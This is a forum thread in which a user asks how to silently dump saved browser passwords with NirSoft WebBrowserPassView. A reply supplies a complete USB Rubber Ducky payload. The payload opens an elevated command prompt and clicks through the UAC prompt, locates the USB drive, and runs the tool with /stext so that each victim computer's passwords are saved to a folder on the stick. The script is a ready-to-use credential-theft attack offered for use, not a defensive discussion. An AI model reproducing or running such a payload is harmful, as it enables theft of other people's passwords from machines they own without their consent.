Save txt file to sd from exe

raphael

Hi I recently see a little program http://www.nirsoft.net/toolsdownload/webbrowserpassview_setup.exe  who works on win7/8/10 who dump/decrypt the web's passwords

so i come here to ask from people who know better than me to help me

So i look for on the internet and thanks to god i success to run the exe but i need help for two more steps

1)I run the exe from cmd so the app doesn't display, and then i can't interact with it ,so i can't write after running my exe "CONTROL S" ,its in the background!

2)and also if i success to save the file how can i know where the explorer will bring me and save the file.

I tried so many ways i saw on the internet to run an exe and save as tx file but no result.

So i join my inject.bin and inject.txt so you can see the code and help me faster 

Thanks in advance for helping.

inject.bin

inject.txt

You need to use the /stext command in the cmd line like this:

STRING start %DUCKYdrive%\Files\Webbrowserpassview.exe /stext %DUCKYdrive%\Passwords\%computername%\Passwords.txt

But for that to work you need to find the assigned drive letter for your usb first, so it would look like this:

DELAY 1000

WINDOWS D

DELAY 250

WINDOWS r

DELAY 250

STRING powershell Start-Process cmd.exe -Verb runAs

ENTER

DELAY 1500

ALT y

DELAY 250

BACKSPACE

STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d

ENTER

DELAY 500

STRING mkdir %duck%\Passwords\%COMPUTERNAME%\

ENTER

STRING for /f "tokens=3 delims= " %A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%A:)

DELAY 500

ENTER

STRING set DUCKYdrive=%DUCKYdrive%

DELAY 500

ENTER

STRING mkdir %DUCKYDRIVE%\Passwords\%COMPUTERNAME%\

DELAY 500

ENTER

STRING start %DUCKYdrive%\Files\WebBrowserPassview.exe /stext %DUCKYdrive%\Passwords\%computername%\Passwords.txt

STRING exit

DELAY 500

ENTER

Just put your webbrowserpassview.exe in a foldar called Files on the usb and it should work if you put this payload on it.